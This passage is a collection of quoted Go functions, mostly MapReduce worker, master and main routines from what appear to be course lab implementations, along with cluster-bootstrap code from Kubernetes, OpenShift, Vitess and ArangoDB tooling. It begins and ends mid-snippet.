kv.Value)\n\t\t\t\t}\n\t\t\t\tofile.Close()\n\t\t\t}\n\t\t} else if reply.TaskType == REDUCE {\n\t\t\t// 读取输入数据\n\t\t\tvar lines []string\n\t\t\tfor mi := 0; mi < reply.MapNum; mi++ {\n\t\t\t\tinputFile := finalMapOutFile(mi, reply.TaskIndex)\n\t\t\t\tfile, err := os.Open(inputFile)\n\t\t\t\tif err != nil {\n\t\t\t\t\tlog.Fatalf(\"Failed to open map output file %s: %e\", inputFile, err)\n\t\t\t\t}\n\t\t\t\tcontent, err := ioutil.ReadAll(file)\n\t\t\t\tif err != nil {\n\t\t\t\t\tlog.Fatalf(\"Failed to read map output file %s: %e\", inputFile, err)\n\t\t\t\t}\n\t\t\t\tlines = append(lines, strings.Split(string(content), \"\\n\")...)\n\t\t\t}\n\t\t\tvar kva []KeyValue\n\t\t\tfor _, line := range lines {\n\t\t\t\tif strings.TrimSpace(line) == \"\" {\n\t\t\t\t\tcontinue\n\t\t\t\t}\n\t\t\t\tparts := strings.Split(line, \"\\t\")\n\t\t\t\tkva = append(kva, KeyValue{\n\t\t\t\t\tKey: parts[0],\n\t\t\t\t\tValue: parts[1],\n\t\t\t\t})\n\t\t\t}\n\t\t\tsort.Sort(ByKey(kva))\n\n\t\t\tofile, _ := os.Create(tmpReduceOutFile(id, reply.TaskIndex))\n\t\t\ti := 0\n\t\t\tfor i < len(kva) {\n\t\t\t\tj := i + 1\n\t\t\t\tfor j < len(kva) && kva[j].Key == kva[i].Key {\n\t\t\t\t\tj++\n\t\t\t\t}\n\t\t\t\tvar values []string\n\t\t\t\tfor k := i; k < j; k++ {\n\t\t\t\t\tvalues = append(values, kva[k].Value)\n\t\t\t\t}\n\t\t\t\toutput := reducef(kva[i].Key, values)\n\n\t\t\t\tfmt.Fprintf(ofile, \"%v %v\\n\", kva[i].Key, output)\n\n\t\t\t\ti = j\n\t\t\t}\n\t\t\tofile.Close()\n\t\t}\n\t\tlastTaskType = reply.TaskType\n\t\tlastTaskIndex = reply.TaskIndex\n\t\tlog.Printf(\"Finished %s task %d\", reply.TaskType, reply.TaskIndex)\n\t}\n\n\tlog.Printf(\"Worker %s exit\\n\", id)\n}", "func NewMaster(addr string, port int, cert *services.HTTPCert) *Master {\n\tvar sm *services.HTTPService\n\n\tif cert == nil {\n\t\tsm = services.NewHTTPService(\"master\", addr, port, nil)\n\t} else {\n\t\tsm = services.NewHTTPSecureService(\"master\", addr, port, cert, nil)\n\t}\n\n\t// reg, err := sm.Select(\"register\")\n\t//\n\t// if err == nil {\n\t//\n\t// \treg.Terminal().Only(grids.ByPackets(func(g *grids.GridPacket) {\n\t// \t\tfmt.Println(\"/register receieves\", g)\n\t// \t}))\n\t// }\n\t//\n\t// disc, err := sm.Select(\"discover\")\n\t//\n\t// if err == nil {\n\t//\n\t// \tdisc.Terminal().Only(grids.ByPackets(func(g *grids.GridPacket) {\n\t// \t\tfmt.Println(\"/discover receieves\", g)\n\t// \t}))\n\t// }\n\t//\n\t// unreg, err := sm.Select(\"unregister\")\n\t//\n\t// if err == nil {\n\t//\n\t// \tunreg.Terminal().Only(grids.ByPackets(func(g *grids.GridPacket) {\n\t// \t\tfmt.Println(\"/unregister receieves\", g)\n\t// \t}))\n\t// }\n\n\treturn &Master{sm}\n}", "func (agent *ActionAgent) InitMaster(ctx context.Context) (string, error) {\n\tif err := agent.lock(ctx); err != nil {\n\t\treturn \"\", err\n\t}\n\tdefer agent.unlock()\n\n\t// Initializing as master implies undoing any previous \"do not replicate\".\n\tagent.setSlaveStopped(false)\n\n\t// we need to insert something in the binlogs, so we can get the\n\t// current position. Let's just use the mysqlctl.CreateReparentJournal commands.\n\tcmds := mysqlctl.CreateReparentJournal()\n\tif err := agent.MysqlDaemon.ExecuteSuperQueryList(ctx, cmds); err != nil {\n\t\treturn \"\", err\n\t}\n\n\t// get the current replication position\n\tpos, err := agent.MysqlDaemon.MasterPosition()\n\tif err != nil {\n\t\treturn \"\", err\n\t}\n\n\t// If using semi-sync, we need to enable it before going read-write.\n\tif err := agent.fixSemiSync(topodatapb.TabletType_MASTER); err != nil {\n\t\treturn \"\", err\n\t}\n\n\t// Set the server read-write, from now on we can accept real\n\t// client writes. Note that if semi-sync replication is enabled,\n\t// we'll still need some slaves to be able to commit transactions.\n\tstartTime := time.Now()\n\tif err := agent.MysqlDaemon.SetReadOnly(false); err != nil {\n\t\treturn \"\", err\n\t}\n\tagent.setExternallyReparentedTime(startTime)\n\n\t// Change our type to master if not already\n\tif _, err := agent.TopoServer.UpdateTabletFields(ctx, agent.TabletAlias, func(tablet *topodatapb.Tablet) error {\n\t\ttablet.Type = topodatapb.TabletType_MASTER\n\t\treturn nil\n\t}); err != nil {\n\t\treturn \"\", err\n\t}\n\n\t// and refresh our state\n\tagent.initReplication = true\n\tif err := agent.refreshTablet(ctx, \"InitMaster\"); err != nil {\n\t\treturn \"\", err\n\t}\n\treturn mysql.EncodePosition(pos), nil\n}", "func (k *Kubeadm) CreateCluster() error {\n\n\tvar (\n\t\tjoinCommand string\n\t\terr error\n\t)\n\n\tif k.ClusterName == \"\" {\n\t\treturn errors.New(\"cluster name is not set\")\n\t}\n\n\terr = k.validateAndUpdateDefault()\n\tif err != nil {\n\t\treturn err\n\t}\n\n\tstartTime := time.Now()\n\n\tlog.Println(\"total master - \" + fmt.Sprintf(\"%v\", len(k.MasterNodes)))\n\tlog.Println(\"total workers - \" + fmt.Sprintf(\"%v\", len(k.WorkerNodes)))\n\n\tif k.HaProxyNode != nil {\n\t\tlog.Println(\"total haproxy - \" + fmt.Sprintf(\"%v\", 1))\n\t}\n\n\tmasterCreationStartTime := time.Now()\n\tjoinCommand, err = k.setupMaster(k.determineSetup())\n\tif err != nil {\n\t\treturn err\n\t}\n\n\tlog.Printf(\"time taken to create masters = %v\", time.Since(masterCreationStartTime))\n\n\tworkerCreationTime := time.Now()\n\n\tif err := k.setupWorkers(joinCommand); err != nil {\n\t\treturn err\n\t}\n\n\tlog.Printf(\"time taken to create workers = %v\", time.Since(workerCreationTime))\n\n\tfor _, file := range k.ApplyFiles {\n\t\terr := k.MasterNodes[0].applyFile(file)\n\t\tif err != nil {\n\t\t\treturn err\n\t\t}\n\t}\n\n\tif k.Networking != nil {\n\t\tlog.Printf(\"installing networking plugin = %v\", k.Networking.Name)\n\t\terr := k.MasterNodes[0].applyFile(k.Networking.Manifests)\n\t\tif err != nil {\n\t\t\treturn err\n\t\t}\n\t} else {\n\t\tlog.Println(\"no network plugin found\")\n\t}\n\n\tlog.Printf(\"Time taken to create cluster %v\\n\", time.Since(startTime).String())\n\n\treturn nil\n}", "func (opt KubeAPIServerStartConfig) MakeMasterConfig(dockerClient dockerhelper.Interface, basedir string) (string, error) {\n\tcomponentName := \"create-master-config\"\n\timageRunHelper := run.NewRunHelper(dockerhelper.NewHelper(dockerClient)).New()\n\tglog.Infof(\"Running %q\", componentName)\n\n\tcreateConfigCmd := []string{\n\t\t\"start\", \"master\",\n\t}\n\tcreateConfigCmd = append(createConfigCmd, opt.Args...)\n\n\tcontainerId, rc, err := imageRunHelper.Image(opt.MasterImage).\n\t\tPrivileged().\n\t\tHostNetwork().\n\t\tHostPid().\n\t\tSaveContainerLogs(componentName, path.Join(basedir, \"logs\")).\n\t\tCommand(createConfigCmd...).Run()\n\tdefer func() {\n\t\tif err = dockerClient.ContainerRemove(containerId, types.ContainerRemoveOptions{}); err != nil {\n\t\t\tglog.Errorf(\"error removing %q: %v\", containerId, err)\n\t\t}\n\t}()\n\tif err != nil {\n\t\treturn \"\", errors.NewError(\"could not run %q: %v\", componentName, err).WithCause(err)\n\t}\n\tif rc != 0 {\n\t\treturn \"\", errors.NewError(\"could not run %q: rc==%v\", componentName, rc)\n\t}\n\n\t// TODO eliminate the linkage that other tasks have on this particular structure\n\tmasterDir := path.Join(basedir, KubeAPIServerDirName)\n\tif err := os.MkdirAll(masterDir, 0755); err != nil {\n\t\treturn \"\", err\n\t}\n\tglog.V(1).Infof(\"Copying OpenShift config to local directory %s\", masterDir)\n\tif err = dockerhelper.DownloadDirFromContainer(dockerClient, containerId, \"/var/lib/origin/openshift.local.config\", masterDir); err != nil {\n\t\tif removeErr := os.RemoveAll(masterDir); removeErr != nil {\n\t\t\tglog.V(2).Infof(\"Error removing temporary config dir %s: %v\", masterDir, removeErr)\n\t\t}\n\t\treturn \"\", err\n\t}\n\n\t// update some listen information to include starting the DNS server\n\tmasterconfigFilename := path.Join(masterDir, \"master-config.yaml\")\n\tmasterconfig, err := componentinstall.ReadMasterConfig(masterconfigFilename)\n\tif err != nil {\n\t\treturn \"\", err\n\t}\n\n\taddImagePolicyAdmission(&masterconfig.AdmissionConfig)\n\n\tif err := componentinstall.WriteMasterConfig(masterconfigFilename, masterconfig); err != nil {\n\t\treturn \"\", err\n\t}\n\n\treturn masterDir, nil\n}", "func (m *Master) initReduceTask() {\n\tm.Phase = Reduce\n\tfor i := 0; i < m.Reducenr; i++ {\n\t\ttask := Task{Type: Reduce, Idx: i}\n\t\tm.Undone[i] = task\n//\t\tlog.Printf(\"initReduceTask type:%d idx:%d\", task.Type, task.Idx)\n\t}\n}", "func WorkerCreation() (int, int){ // rval: Worker id, nReduce\n\tworkerMsg := WorkerMessage{}\n\n\tcall(\"Master.WorkerCreation\", &workerMsg, &workerMsg)\n\n\tfmt.Printf(\"Received ID (%v) from master\\n\", workerMsg.ID)\n\n\treturn workerMsg.ID, workerMsg.NReduce\n}", "func main() {\n\tif len(os.Args) < 4 {\n\t\tfmt.Printf(\"%s: see usage comments in file\\n\", os.Args[0])\n\t} else if os.Args[1] == \"master\" {\n\t\tvar mr *mapreduce.Master\n\t\tif os.Args[2] == \"sequential\" {\n\t\t\tmr = mapreduce.Sequential(\"iiseq\", os.Args[3:], 3, mapF, reduceF)\n\t\t} else {\n\t\t\tmr = mapreduce.Distributed(\"iiseq\", os.Args[3:], 3, os.Args[2])\n\t\t}\n\t\tmr.Wait()\n\t} else {\n\t\tmapreduce.RunWorker(os.Args[2], os.Args[3], mapF, reduceF, 100)\n\t}\n}", "func main() {\n\tif len(os.Args) < 4 {\n\t\tfmt.Printf(\"%s: see usage comments in file\\n\", os.Args[0])\n\t} else if os.Args[1] == \"master\" {\n\t\tvar mr *mapreduce.Master\n\t\tif os.Args[2] == \"sequential\" {\n\t\t\tmr = mapreduce.Sequential(\"iiseq\", os.Args[3:], 3, mapF, reduceF)\n\t\t} else {\n\t\t\tmr = mapreduce.Distributed(\"iiseq\", os.Args[3:], 3, os.Args[2])\n\t\t}\n\t\tmr.Wait()\n\t} else {\n\t\tmapreduce.RunWorker(os.Args[2], os.Args[3], mapF, reduceF, 100)\n\t}\n}", "func (s *Service) bootstrapMaster(ctx context.Context, runner Runner, config Config, bsCfg BootstrapConfig) {\n\t// Check HTTP server port\n\tcontainerHTTPPort, _, err := s.getHTTPServerPort()\n\tif err != nil {\n\t\ts.log.Fatal().Err(err).Msg(\"Cannot find HTTP server info\")\n\t}\n\tif !WaitUntilPortAvailable(config.BindAddress, containerHTTPPort, time.Second*5) {\n\t\ts.log.Fatal().Msgf(\"Port %d is already in use\", containerHTTPPort)\n\t}\n\n\t// Select storage engine\n\tstorageEngine := bsCfg.ServerStorageEngine\n\tif storageEngine == \"\" {\n\t\tstorageEngine = s.DatabaseFeatures().DefaultStorageEngine()\n\t\tbsCfg.ServerStorageEngine = storageEngine\n\t}\n\ts.log.Info().Msgf(\"Using storage engine '%s'\", bsCfg.ServerStorageEngine)\n\n\t// Create initial cluster configuration\n\thasAgent := boolFromRef(bsCfg.StartAgent, !s.mode.IsSingleMode())\n\thasDBServer := boolFromRef(bsCfg.StartDBserver, true)\n\thasCoordinator := boolFromRef(bsCfg.StartCoordinator, true)\n\thasResilientSingle := boolFromRef(bsCfg.StartResilientSingle, s.mode.IsActiveFailoverMode())\n\thasSyncMaster := boolFromRef(bsCfg.StartSyncMaster, true) && config.SyncEnabled\n\thasSyncWorker := boolFromRef(bsCfg.StartSyncWorker, true) && config.SyncEnabled\n\tme := NewPeer(s.id, config.OwnAddress, s.announcePort, 0, config.DataDir,\n\t\thasAgent, hasDBServer, hasCoordinator, hasResilientSingle,\n\t\thasSyncMaster, hasSyncWorker, s.IsSecure())\n\ts.myPeers.Initialize(me, bsCfg.AgencySize, storageEngine, s.cfg.Configuration.PersistentOptions)\n\ts.learnOwnAddress = config.OwnAddress == \"\"\n\n\t// Start HTTP listener\n\ts.startHTTPServer(config)\n\n\t// Permanent loop:\n\ts.log.Info().Msgf(\"Serving as master with ID '%s' on %s:%d...\", s.id, config.OwnAddress, s.announcePort)\n\n\t// Can we start right away?\n\tneedMorePeers := true\n\tif s.mode.IsSingleMode() {\n\t\tneedMorePeers = false\n\t} else if !s.myPeers.HaveEnoughAgents() {\n\t\tneedMorePeers = true\n\t} else if bsCfg.StartLocalSlaves {\n\t\tpeersNeeded := bsCfg.PeersNeeded()\n\t\tneedMorePeers = len(s.myPeers.AllPeers) < peersNeeded\n\t}\n\tif !needMorePeers {\n\t\t// We have all the agents that we need, start a single server/cluster right now\n\t\ts.saveSetup()\n\t\ts.log.Info().Msg(\"Starting service...\")\n\t\ts.startRunning(runner, config, bsCfg)\n\t\treturn\n\t}\n\n\twg := sync.WaitGroup{}\n\tif bsCfg.StartLocalSlaves {\n\t\t// Start additional local slaves\n\t\ts.createAndStartLocalSlaves(&wg, config, bsCfg)\n\t} else {\n\t\t// Show commands needed to start slaves\n\t\ts.log.Info().Msgf(\"Waiting for %d servers to show up.\\n\", s.myPeers.AgencySize)\n\t\ts.showSlaveStartCommands(runner, config)\n\t}\n\n\tfor {\n\t\ttime.Sleep(time.Second)\n\t\tselect {\n\t\tcase <-s.bootstrapCompleted.ctx.Done():\n\t\t\ts.saveSetup()\n\t\t\ts.log.Info().Msg(\"Starting service...\")\n\t\t\ts.startRunning(runner, config, bsCfg)\n\t\t\treturn\n\t\tdefault:\n\t\t}\n\t\tif ctx.Err() != nil {\n\t\t\t// Context is cancelled, stop now\n\t\t\tbreak\n\t\t}\n\t}\n\t// Wait for any local slaves to return.\n\twg.Wait()\n}", "func main() {\n\tif len(os.Args) < 4 {\n\t\tfmt.Printf(\"%s: see usage comments in file\\n\", os.Args[0])\n\t} else if os.Args[1] == \"master\" {\n\t\tvar mr *mapreduce.Master\n\t\tif os.Args[2] == \"sequential\" {\n\t\t\tmr = mapreduce.Sequential(\"wcseq\", os.Args[3:], 3, wcMapF, wcReduceF)\n\t\t} else {\n\t\t\tmr = mapreduce.Distributed(\"wcseq\", os.Args[3:], 3, os.Args[2])\n\t\t}\n\t\tmr.Wait()\n\t} else {\n\t\tmapreduce.RunWorker(os.Args[2], os.Args[3], wcMapF, wcReduceF, 100)\n\t}\n}", "func Worker(mapf func(string, string) []KeyValue,\n\treducef func(string, []string) string) {\n\n\t// Your worker implementation here.\n\n\t// uncomment to send the Example RPC to the master.\n\t// CallExample()\n\n\tcallMs := true\n\n\ttfl := make([]string, 0)\n\tfor callMs {\n\t\tcallMs, _ = callMaster(mapf, &tfl)\n\t\t//time.Sleep(5 * time.Second)\n\t}\n\n\t//\tsort.Sort(ByKey(intermediate))\n\trand.Seed(time.Now().UnixNano())\n\tred := rand.Intn(1000)\n\tfmt.Printf(\"Reducer filename %d \\n\", red)\n\toname := fmt.Sprintf(\"mr-out-%d.txt\", red)\n\n\tofile, _ := os.Create(oname)\n\tintermediate1 := []KeyValue{}\n\tvar fm sync.Mutex\n\tfm.Lock()\n\tfor _, tf := range tfl {\n\t\tfile, err := os.Open(tf)\n\t\tif err != nil {\n\t\t\tlog.Fatalf(\"cannot open %v\", tf)\n\t\t}\n\t\tdec := json.NewDecoder(file)\n\t\tfor {\n\t\t\tvar kv KeyValue\n\t\t\tif err := dec.Decode(&kv); err != nil {\n\t\t\t\tbreak\n\t\t\t}\n\t\t\tintermediate1 = append(intermediate1, kv)\n\t\t}\n\t}\n\tsort.Sort(ByKey(intermediate1))\n\n\tfm.Unlock()\n\ti := 0\n\tfor i < len(intermediate1) {\n\t\tj := i + 1\n\t\tfor j < len(intermediate1) && intermediate1[j].Key == intermediate1[i].Key {\n\t\t\tj++\n\t\t}\n\t\tvalues := []string{}\n\t\tfor k := i; k < j; k++ {\n\t\t\tvalues = append(values, intermediate1[k].Value)\n\t\t}\n\t\toutput := reducef(intermediate1[i].Key, values)\n\n\t\t// this is the correct format for each line of Reduce output.\n\t\tfmt.Fprintf(ofile, \"%v %v\\n\", intermediate1[i].Key, output)\n\n\t\ti = j\n\t}\n\tfor _, f := range tfl {\n\t\tos.Remove(f)\n\t}\n\tofile.Close()\n\tCallNotify(\"wc\", 0)\n\n}", "func Worker(mapf func(string, string) []KeyValue,\n\treducef func(string, []string) string) {\n\n\t// Your worker implementation here.\n\n\t// uncomment to send the Example RPC to the master.\n\tisMapFinished := false\n\tfor isMapFinished != true {\n\t\tresp := CallAssignMapTask()\n\t\tmaptask := resp.Task\n\t\tnReduce := resp.NReduce\n\n\t\tif maptask.TaskNum != -1 {\n\t\t\tfile, err := os.Open(maptask.Filename)\n\t\t\tdefer file.Close()\n\n\t\t\tlog.Printf(\"[Worker %v] Starting on map task: %+v\\n\", os.Getpid(), maptask.Filename)\n\t\t\tif err != nil {\n\t\t\t\tlog.Fatalf(\"cannot open map file %v\\n\", err)\n\t\t\t}\n\t\t\tcontent, err := ioutil.ReadAll(file)\n\t\t\tif err != nil {\n\t\t\t\tlog.Fatalf(\"cannot read %v\\n\", maptask.Filename)\n\t\t\t}\n\t\t\tmaptask.Result = mapf(maptask.Filename, string(content))\n\n\t\t\tintermediate := make(map[int][]KeyValue)\n\t\t\tfor _, kv := range maptask.Result {\n\t\t\t\treduceTaskNum := ihash(kv.Key) % nReduce\n\t\t\t\tintermediate[reduceTaskNum] = append(intermediate[reduceTaskNum], kv)\n\t\t\t}\n\n\t\t\tfor i := 0; i < nReduce; i++ {\n\t\t\t\ttmpFileName := \"tmp-\" + strconv.Itoa(maptask.TaskNum) + \"-\" + strconv.Itoa(i) + \".txt\"\n\t\t\t\tifile, err := ioutil.TempFile(\"\", tmpFileName)\n\t\t\t\tif err != nil {\n\t\t\t\t\tlog.Fatalf(\"Cannot create ifile: %v\\n\", err)\n\t\t\t\t}\n\n\t\t\t\tenc := json.NewEncoder(ifile)\n\t\t\t\tfor _, kv := range intermediate[i] {\n\t\t\t\t\tif err := enc.Encode(&kv); err != nil {\n\t\t\t\t\t\tlog.Fatalf(\"Cannot write to file: %v\\n\", err)\n\t\t\t\t\t}\n\t\t\t\t}\n\t\t\t\tos.Rename(ifile.Name(), tmpFileName)\n\t\t\t}\n\t\t} else {\n\t\t\tlog.Printf(\"[Worker %v] Waiting for other workers to finish...\\n\", os.Getpid())\n\t\t\ttime.Sleep(1 * time.Second)\n\t\t}\n\n\t\tisMapFinished = CallCompleteMapTask(maptask)\n\t}\n\n\tisReduceFinished := false\n\tfor isReduceFinished != true {\n\t\treducetask := CallAssignReduceTask()\n\n\t\tif reducetask.TaskNum != -1 {\n\t\t\tlog.Printf(\"[Worker %v] Starting on reduce task: %+v\\n\", os.Getpid(), reducetask)\n\t\t\tpattern := fmt.Sprintf(\"./tmp-*-%v.txt\", reducetask.TaskNum)\n\t\t\tfilenames, _ := filepath.Glob(pattern)\n\t\t\tvar intermediate []KeyValue\n\t\t\tfor _, p := range filenames {\n\t\t\t\tfile, err := os.Open(p)\n\t\t\t\tdefer file.Close()\n\t\t\t\tif err != nil {\n\t\t\t\t\tlog.Fatalf(\"cannot open reduce %v\\n\", p)\n\t\t\t\t}\n\t\t\t\tdec := json.NewDecoder(file)\n\t\t\t\tfor {\n\t\t\t\t\tvar kv KeyValue\n\t\t\t\t\tif err := dec.Decode(&kv); err != nil {\n\t\t\t\t\t\tbreak\n\t\t\t\t\t}\n\t\t\t\t\tintermediate = append(intermediate, kv)\n\t\t\t\t}\n\t\t\t}\n\t\t\tsort.Sort(ByKey(intermediate))\n\t\t\toname := \"./mr-out-\" + strconv.Itoa(reducetask.TaskNum)\n\t\t\tofile, _ := os.Create(oname)\n\t\t\tdefer ofile.Close()\n\t\t\ti := 0\n\t\t\tfor i < len(intermediate) {\n\t\t\t\tj := i + 1\n\t\t\t\tfor j < len(intermediate) && intermediate[i].Key == intermediate[j].Key {\n\t\t\t\t\tj++\n\t\t\t\t}\n\t\t\t\tvalues := []string{}\n\t\t\t\tfor k := i; k < j; k++ {\n\t\t\t\t\tvalues = append(values, intermediate[k].Value)\n\t\t\t\t}\n\n\t\t\t\toutput := reducef(intermediate[i].Key, values)\n\t\t\t\tfmt.Fprintf(ofile, \"%v %v\\n\", intermediate[i].Key, output)\n\n\t\t\t\ti = j\n\t\t\t}\n\t\t} else {\n\t\t\tlog.Printf(\"[Worker %v] Waiting for other workers to finish...\\n\", os.Getpid())\n\t\t\ttime.Sleep(1 * time.Second)\n\t\t}\n\n\t\tisReduceFinished = CallCompleteReduceTask(reducetask)\n\t}\n\n}", "func main() {\n\tif len(os.Args) < 4 {\n\t\tfmt.Printf(\"%s: see usage comments in file\\n\", os.Args[0])\n\t} else if os.Args[1] == \"master\" {\n\t\tvar mr *mapreduce.Master\n\t\tif os.Args[2] == \"sequential\" {\n\t\t\tmr = mapreduce.Sequential(\"iiseq\", os.Args[3:], 3, mapF, reduceF)\n\t\t} else {\n\t\t\tmr = mapreduce.Distributed(\"iiseq\", os.Args[3:], 3, os.Args[2])\n\t\t}\n\t\tmr.Wait()\n\t} else {\n\t\tmapreduce.RunWorker(os.Args[2], os.Args[3], mapF, reduceF, 100, nil)\n\t}\n}", "func (m *Master) Build() {\n\toutChannel := make(chan [2]string, 100)\n\n\tvar channels [][]chan [2]string\n\tfor i := 0; i < len(m.workers); i++ {\n\t\tvar newChannels []chan [2]string\n\t\tfor j := 0; j < len(m.workers[i]); j++ {\n\t\t\tnewChannels = append(newChannels, make(chan [2]string, 100))\n\t\t}\n\t\tchannels = append(channels, newChannels)\n\t}\n\tfor j := 0; j < len(m.workers[0]); j++ {\n\t\tm.workers[0][j].init(1, channels[0][j], channels[1])\n\t}\n\tfor i := 1; i < len(m.workers)-1; i++ {\n\t\tfor j := 0; j < len(m.workers[i]); j++ {\n\t\t\tm.workers[i][j].init(len(m.workers[i-1]), channels[i][j], channels[i+1])\n\t\t}\n\t}\n\tlast := len(m.workers) - 1\n\tfor j := 0; j < len(m.workers[last]); j++ {\n\t\tm.workers[last][j].init(len(m.workers[last-1]), channels[last][j], []chan [2]string{outChannel})\n\t}\n\n\tm.input.init(channels[0])\n\n\tm.output.init(len(m.workers[last]), outChannel)\n\n\tm.output.numUpstream = len(m.workers[last])\n\tm.output.inChannel = outChannel\n\tm.output.endChannel = make(chan int)\n}", "func Worker(mapf func(string, string) []KeyValue,\n\treducef func(string, []string) string) {\n\n\tmapTaskCount, reduceTaskCount := 0, 0\n\tfor true {\n\t\targs, reply := GetTaskArgs{}, GetTaskReply{}\n\t\tcall(\"Master.GetTask\", &args, &reply)\n\n\t\tif reply.TaskType == \"Map\" {\n\t\t\tmapTaskCount++\n\t\t\tdoMap(reply.FilePath, mapf, reply.MapTaskNum, reply.ReduceTaskCount)\n\t\t} else if reply.TaskType == \"Reduce\" {\n\t\t\treduceTaskCount++\n\t\t\tdoReduce(reply.ReduceTaskNum, reducef, reply.FilePathList)\n\t\t} else if reply.TaskType == \"Clean Exit\" {\n\t\t\tos.Exit(0)\n\t\t}\n\t}\n\n}", "func Worker(mapf func(string, string) []KeyValue,\n\treducef func(string, []string) string) {\n\n\t// init\n\ttaskId = 9999\n\n\t//\n\tfor {\n\t\ttime.Sleep(time.Second)\n\n\t\treply := CallAssign()\n\n\t\t// fmt.Println(reply)\n\n\t\tif reply.TaskId < 0 {\n\t\t\t// fmt.Println(\"Waiting for assigning a work...\")\n\t\t\tcontinue\n\t\t}\n\n\t\t// modify taskId and later will tell master who i am\n\t\ttaskId = reply.TaskId\n\n\t\tif reply.TaskType == \"map\" {\n\t\t\tfile, err := os.Open(reply.FileName)\n\t\t\tif err != nil {\n\t\t\t\tlog.Fatalf(\"cannot open %v\", reply.FileName)\n\t\t\t}\n\t\t\tcontent, err := ioutil.ReadAll(file)\n\t\t\tif err != nil {\n\t\t\t\tlog.Fatalf(\"cannot read %v\", reply.FileName)\n\t\t\t}\n\t\t\tfile.Close()\n\t\t\tkva := mapf(reply.FileName, string(content))\n\n\t\t\t// sort\n\t\t\t// sort.Sort(ByKey(kva))\n\n\t\t\t// store intermediate kvs in tempFile\n\t\t\ttempFileName := \"tmp-\" + reply.TaskType + \"-\" + strconv.Itoa(reply.TaskId)\n\n\t\t\tfile, err = os.Create(tempFileName)\n\t\t\tif err != nil {\n\t\t\t\tlog.Fatal(\"cannot create %v\", tempFileName)\n\t\t\t}\n\n\t\t\t// transform k,v into json\n\t\t\tenc := json.NewEncoder(file)\n\t\t\tfor _, kv := range kva {\n\t\t\t\terr := enc.Encode(&kv)\n\t\t\t\tif err != nil {\n\t\t\t\t\tlog.Fatal(err)\n\t\t\t\t}\n\t\t\t}\n\t\t\t//\n\t\t\tfile.Close()\n\n\t\t\t// try to delay sometime\n\t\t\t// ran := rand.Intn(4)\n\t\t\t// fmt.Printf(\"Sleep %v s\\n\", ran)\n\t\t\t// d := time.Second * time.Duration(ran)\n\t\t\t// time.Sleep(d)\n\n\t\t\t// tell the master the mapwork has done\n\t\t\tCallDoneTask(reply, tempFileName)\n\n\t\t} else if reply.TaskType == \"reduce\" {\n\t\t\t// fmt.Println(reply.TaskType)\n\n\t\t\tkva := []KeyValue{}\n\n\t\t\tfile, err := os.Open(reply.FileName)\n\t\t\tif err != nil {\n\t\t\t\tlog.Fatal(err)\n\t\t\t}\n\n\t\t\tdec := json.NewDecoder(file)\n\t\t\tfor {\n\t\t\t\tvar kv KeyValue\n\t\t\t\tif err := dec.Decode(&kv); err != nil {\n\t\t\t\t\tbreak\n\t\t\t\t}\n\t\t\t\tkva = append(kva, kv)\n\t\t\t}\n\n\t\t\toutputFileName := \"mr-out-\" + strconv.Itoa(reply.TaskIndex)\n\t\t\tofile, _ := os.Create(outputFileName)\n\n\t\t\t// sort\n\t\t\t// sort.Sort(ByKey(kva))\n\n\t\t\ti := 0\n\t\t\tfor i < len(kva) {\n\t\t\t\tj := i + 1\n\t\t\t\tfor j < len(kva) && kva[j].Key == kva[i].Key {\n\t\t\t\t\tj++\n\t\t\t\t}\n\t\t\t\tvalues := []string{}\n\t\t\t\tfor k := i; k < j; k++ {\n\t\t\t\t\tvalues = append(values, kva[k].Value)\n\t\t\t\t}\n\t\t\t\toutput := reducef(kva[i].Key, values)\n\n\t\t\t\t// fmt.Println(output)\n\n\t\t\t\tfmt.Fprintf(ofile, \"%v %v\\n\", kva[i].Key, output)\n\n\t\t\t\ti = j\n\t\t\t}\n\n\t\t\tofile.Close()\n\n\t\t\t// fmt.Printf(\"Reduce task %v has finished.\\n\", reply.TaskIndex)\n\n\t\t\t// ran := rand.Intn(4)\n\t\t\t// fmt.Printf(\"Sleep %v s\\n\", ran)\n\t\t\t// d := time.Second * time.Duration(ran)\n\t\t\t// time.Sleep(d)\n\n\t\t\tCallDoneTask(reply, outputFileName)\n\t\t} else if reply.TaskType == \"close\" {\n\t\t\t// fmt.Println(\"MapReduce has done. Exiting...\")\n\t\t\tbreak\n\t\t} else {\n\t\t\tfmt.Println(\"UnExcepted TaskType\")\n\t\t}\n\n\t}\n\n}", "func (b *ClusterNodesBuilder) Master(value int) *ClusterNodesBuilder {\n\tb.master = &value\n\treturn b\n}", "func main() {\n\tlog.SetFlags(log.Lshortfile | log.LstdFlags)\n\t// show log line\n\tif len(os.Args) < 4 {\n\t\tfmt.Printf(\"%s: see usage comments in file\\n\", os.Args[0])\n\t} else if os.Args[1] == \"master\" {\n\t\tvar mr *mapreduce.Master\n\t\tif os.Args[2] == \"sequential\" {\n\t\t\tmr = mapreduce.Sequential(\"wcseq\", os.Args[3:], 3, mapF, reduceF)\n\t\t} else {\n\t\t\tmr = mapreduce.Distributed(\"wcseq\", os.Args[3:], 3, os.Args[2])\n\t\t}\n\t\tmr.Wait()\n\t} else {\n\t\tmapreduce.RunWorker(os.Args[2], os.Args[3], mapF, reduceF, 100, nil)\n\t}\n}", "func (m *SequentialMaster) Merge() string {\n\tmergeReduceOutputs(m.JobName, m.NumReducers)\n\treturn MergeOutputName(m.JobName)\n}", "func (m *Master) Connect(a *ConnectArgs, r *ConnectRes) error {\n\tm.mu.Lock()\n\tdefer m.mu.Unlock()\n\n\tm.idSeq++\n\ts := &MasterSlave{\n\t\tid: m.idSeq,\n\t\tprocs: a.Procs,\n\t\tlastSync: time.Now(),\n\t}\n\tm.slaves[s.id] = s\n\tr.ID = s.id\n\t// Give the slave initial corpus.\n\tfor _, a := range m.corpus.m {\n\t\tr.Corpus = append(r.Corpus, MasterInput{a.data, a.meta, execCorpus, !a.user, true})\n\t}\n\treturn nil\n}", "func CreateMaster() (*ObiMaster) {\n\n\t// Load priority map\n\tpriorityMap := map[string]int{}\n\ttmp := viper.GetStringMap(\"priorityMap\")\n\tfor k, v := range tmp {\n\t\tif vInt, ok := v.(int); ok {\n\t\t\tpriorityMap[k] = vInt\n\t\t} else {\n\t\t\tlogrus.Panicln(\"Not integer value in the priority map.\")\n\t\t}\n\n\t}\n\n\t// Start up the pool\n\tpool.GetPool().StartLivelinessMonitoring()\n\n\t// Setup scheduler\n\tsubmitter := pool.NewSubmitter()\n\tscheduler := scheduling.New(submitter)\n\tscheduler.SetupConfig()\n\n\t// Setup heartbeat\n\thb := heartbeat.New()\n\n\t// Start everything\n\thb.Start()\n\tscheduler.Start()\n\n\t// Open connection to predictor server\n\tserverAddr := 